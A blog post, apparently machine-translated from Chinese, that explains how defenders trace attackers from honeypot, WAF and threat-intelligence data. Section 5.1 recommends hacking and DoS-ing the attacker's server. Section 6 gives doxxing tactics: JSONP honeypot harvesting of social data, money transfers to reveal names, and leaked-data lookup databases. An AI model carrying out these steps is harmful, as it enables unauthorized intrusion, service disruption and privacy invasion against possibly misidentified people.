xfeng

xfeng

健身 技术 阅读 思考 记录
tg_channel
tg_channel
github
bilibili
tg_channel
HomePortfoliosArchivesAbout

Source analysis

#溯源80
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The article discusses the process of source tracing analysis in cybersecurity. It explains that source tracing involves identifying the virtual and real identities of hackers, as well as their attack methods and goals. The article also mentions various sources of data for analysis, such as honeypot platforms, traffic detection platforms, WAF, IDS, IPS, and phishing emails. It outlines the general process of source tracing, including capturing the attack source, analyzing logs and abnormal server resources, and using threat intelligence analysis platforms to gather information about the attacker's activities. The article also discusses the use of WAF and traffic detection devices to filter and analyze attack traffic, as well as the analysis of threat intelligence and host information. It further explains the process of source tracing for IP addresses and domain names, including using threat intelligence queries, port scanning, and domain name resolution. The article also mentions the use of honeypots to gather social information about attackers and highlights the importance of social engineering techniques in source tracing. It concludes by emphasizing the significance of social engineering databases and the use of high-interaction honeypots in the source tracing process.

image

1. Overview#

In general, source tracing in attack and defense exercises involves: reconstructing the attack chain, tracing back to the hacker's virtual identity, real identity, tracing back to the attacking team members, and taking control of the attacker's host.

Generally, the data obtained by the blue team members comes from the following sources:

  • Honeypot platforms
  • Traffic detection platforms
  • WAF, IDS, IPS
  • Phishing emails

After obtaining the data information, we need to analyze the data.

Key information to focus on:

  • IP address
  • DNSLOG, C2 address
  • Information in phishing emails
  • Hacker ID captured by honeypots

Different devices have different analysis approaches.

2. General Process of Source Tracing#

Capture the attack source

  • Security device alerts (scanned IP, intrusion events)
  • Log traffic analysis
  • Abnormal server resources (abnormal files, processes, ports, scheduled tasks, etc.)
  • Phishing emails (obtain malicious file samples)
  • Honeypot system (obtain attacker behavior)

Source tracing countermeasures

  • IP geolocation technology
  • ID tracking techniques (search engines, social platforms, etc.)
  • Website URLs (WHOIS queries, etc.)
  • Malicious samples (extract sample features, username IDs, etc.)

Attacker profiling

  • Restore the attack path
  • Attack objectives
  • What network proxies are used
  • Attack methods (web penetration, near-source penetration, social engineering, etc.)
  • Obtain attacker's: virtual identity, real identity, contact information, organizational situation, etc.

3. WAF, Traffic Detection Devices#

  • Request data packets -> may contain bounced C2 addresses or DNSLOG addresses
  • Some registrable websites -> obtain attacker's registered mobile phone number, ID card information, etc.
  • IP address -> analyze the attack behavior path -> filter foreign zombie IPs
  • Pay special attention to attack traffic from cloud servers such as Alibaba and Tencent

4. Threat Intelligence Analysis#

After obtaining the attack IP, we can search on threat intelligence analysis platforms to obtain information such as host information, recent activities, and domain name resolution.

Useful websites:

ThreatBook Online Intelligence Community

Qihoo 360 Threat Intelligence Center

360 Threat Intelligence Center

VenusEye Threat Intelligence Center

RiskIQ Community

4.1 Host Information#

Pay special attention to port information

4.2 Domain Name Resolution Records#

Recently resolved domain names to the IP

  • If it exists -> continue analysis
  • If it does not exist and the result of pinging the domain name is not an attack IP, stop analysis

.cn domain names

5. IP & Domain Name Tracing#

In some cases, attackers may leave behind the IP or domain name they use, usually for downloading malicious code, reverse proxying, etc. After obtaining the IP or domain name used by the attacker, I usually use the following methods to trace:

5.1 IP#

  1. Through threat intelligence queries, you may obtain the location, ISP, and resolved domain names of the IP.
  2. Perform a full port scan of the IP using Nmap, scan for vulnerabilities on the ports that provide services, and try to take down the attacking server.
  3. Use network asset mapping engines to search for the IP used for attack tracing and obtain the services provided by the IP.
  4. Query precise location data for the IP.
  5. Launch a DoS attack on the services provided by the IP to prevent further attacks.
  6. Most attackers use VPS for proxy forwarding or directly launch attacks using VPS. You can submit a ticket to the VPS provider, explaining the attack behavior of the IP. The service provider may prohibit the attack behavior of the IP or ban the attacker's account.

5.2 Domain Name#

  1. Use Whois queries to obtain email addresses and names.
  2. Check the domain name filing information in the Ministry of Industry and Information Technology.
  3. Query the historical Whois information of the domain name.
  4. Search the domain name in search engines, and you may discover the attacker's other account information.

Geolocation query:

IP Location Website

Red team attackers may launch attacks using mobile hotspots. We can use geolocation queries to determine their location.

6. Honeypot Tracing#

In modern browsers, the same-origin policy is the core of ensuring user access security. In order to allow cross-origin requests, JSONP was born.

In HTML, the src attribute of the script tag is not affected by the same-origin policy. By using the script tag to reference a JavaScript file from a different domain, cross-origin requests can be made. This is JSONP.

Honeypots also use this principle to obtain social information.

Obtaining social information through JSONP in honeypots is relatively difficult and generally requires the following two conditions:

  1. The third-party website to be obtained allows cross-origin requests and contains sensitive information in the cross-origin information.
  2. The attacker has logged in to the third-party website and has not logged out.

After obtaining social information through honeypots, the following aspects are generally targeted:

6.1 QQ Number#

  1. If the obtained information is a QQ number, you can try to obtain personal information such as the binding of the QQ number to a bank card by making a large transfer to the QQ number. You can generally obtain one character from the first name or last name.
  2. Search the QQ number or the email address associated with the QQ number on forums such as Baidu Tieba, and you may obtain Baidu Tieba accounts.
  3. Use Whois to reverse lookup the QQ email address, and you may obtain the name or domain name.
  4. Search the QQ number in WeChat, and you may get the attacker's WeChat account.
  5. Add the QQ number using a secondary account and try to obtain more information through social engineering methods (based on obtaining a large amount of personal information).

6.2 Phone Number#

  1. Transfer money to the account associated with the phone number in Alipay to try to obtain the real user's name corresponding to the phone number.
  2. Search the phone number in WeChat to try to obtain the WeChat account.
  3. Search the phone number on DingTalk, and you may obtain part of the real name and work unit.
  4. Search the phone number on search engines, and you may obtain other account information.
  5. Check the websites registered with the phone number.

6.3 Tieba Account#

  1. Use Tieba Toolbox to obtain the account's homepage and posted content.
  2. Check the posted content to see if you can find QQ numbers, phone numbers, email addresses, approximate age, name, etc.

6.4 Social Engineering Databases#

In my opinion, social engineering databases are more used for cross-validation and are not a direct way to obtain data. Therefore, they should be compared with social engineering databases after obtaining enough information to confirm the real information.

6.5 Other Account Information#

  1. Search QQ nickname, WeChat nickname, Alipay nickname, Tieba nickname, etc., and you may obtain information from other platforms, such as Weibo, Zhihu, GitHub, and other forums and SNS communities.
  2. Detailed information in the account to extract more useful information, such as name, gender, age, address, work unit, school, etc.

6.6 School#

  1. If you obtain school information and name, you can search the attacker's major information, class, enrollment time, graduation time, student ID, etc. on search engines.
  2. You can inquire through the school's Tieba, QQ group, etc., to obtain more personal information.
  3. For master's degree or above, you can search for papers on the China National Knowledge Infrastructure (CNKI) to confirm the research direction.

6.7 Email#

  1. Check the websites registered with the email address.

6.8 Hacker ID Tracing#

  1. Search engines
  2. Major security response centers (SRCs)
  3. Community consultations

7. Summary#

The results of source tracing are generally as follows:

  • Name/ID:

  • Attack IP:

  • Geolocation:

  • QQ:

  • IP address owner company:

  • IP address associated domain names:

  • Email:

  • Phone number:

  • WeChat/Weibo/SRC/ID proof:

  • Profile picture:

  • Jump server:

  • Associated attack events:

During the source tracing process, social engineering databases are the most important, followed by the aforementioned source tracing analysis approaches.

If there are honeypot devices, try to set them to high interaction.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.